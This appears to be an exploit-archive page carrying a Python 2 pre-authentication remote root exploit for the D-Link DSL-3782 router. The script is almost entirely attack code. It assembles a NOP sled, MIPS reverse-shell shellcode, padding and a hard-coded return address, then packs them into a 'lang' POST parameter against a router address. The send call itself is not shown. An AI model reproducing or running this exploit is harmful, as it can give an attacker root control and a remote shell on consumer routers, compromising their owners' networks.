D-Link DSL-3782 Pre-Authentication Remote Root

D-Link DSL-3782 pre-authentication remote root exploit.


MD5 | a6737ad9475fdc7acd7e5df474362dd1

#!/usr/bin/python2
# preauth rece for dlink dsl-3782
# found: 06.11.2021
# pwned: 18.112021 @ 19:26
#


import sys
import urllib2 # requests
import urllib
import struct

target = 'http://192.168.0.50/index.php' # cgi-bin/ChgLang.asp'




nopsled = ""
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
for i in range(74):
nopsled += "\x41\x41\x41\x41" # 26\x40\x08\x01"


#print("nopsled len: %s" % len(nopsled))
#print(len(nopsled))


# shellcode; revshell: 272-232=?:
buf = b""
buf += b"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01"
buf += b"\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01"
buf += b"\x01\x0c\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70"
buf += b"\x27\x24\x0d\xff\xfd\x01\xa0\x68\x27\x01\xcd\x68\x04"
buf += b"\x24\x0e\x27\x0f\x01\xae\x68\x25\xaf\xad\xff\xe0\xaf"
buf += b"\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x02\x10"
buf += b"\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff"
buf += b"\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25"
buf += b"\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02"
buf += b"\x10\x20\x25\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02"
buf += b"\x10\x48\x01\x01\x01\x0c\xaf\xa2\xff\xff\x24\x11\xff"
buf += b"\xfd\x02\x20\x88\x27\x8f\xa4\xff\xff\x02\x20\x28\x21"
buf += b"\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x22"
buf += b"\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff\x3c\x0f"
buf += b"\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"
buf += b"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4"
buf += b"\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27"
buf += b"\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c"


shellcode = buf


#shellcode = ( "D" * 276 )





ret = struct.pack(">I", 0x7fff45b0) # ;] 0x7fff4528) # 0x2abccbb0) # system(); 0x2b269fcc) # SELECT... x2accefcc) # 0x123456) # 0x42424242)
junk = "A" * 68 # 136 # 264 # (596 - len(shellcode) - len(ret)) # - len(nopsled))




###############
#payload = junk + shellcode + ret
payload = nopsled + shellcode + junk + ret

#print(len(payload))
print(payload)

data = urllib.urlencode({'lang' : payload })

sendme = urllib2.Request(target, data ) # url=target, data=post_me)

#print(sendme)

#print "DONE"














Related Posts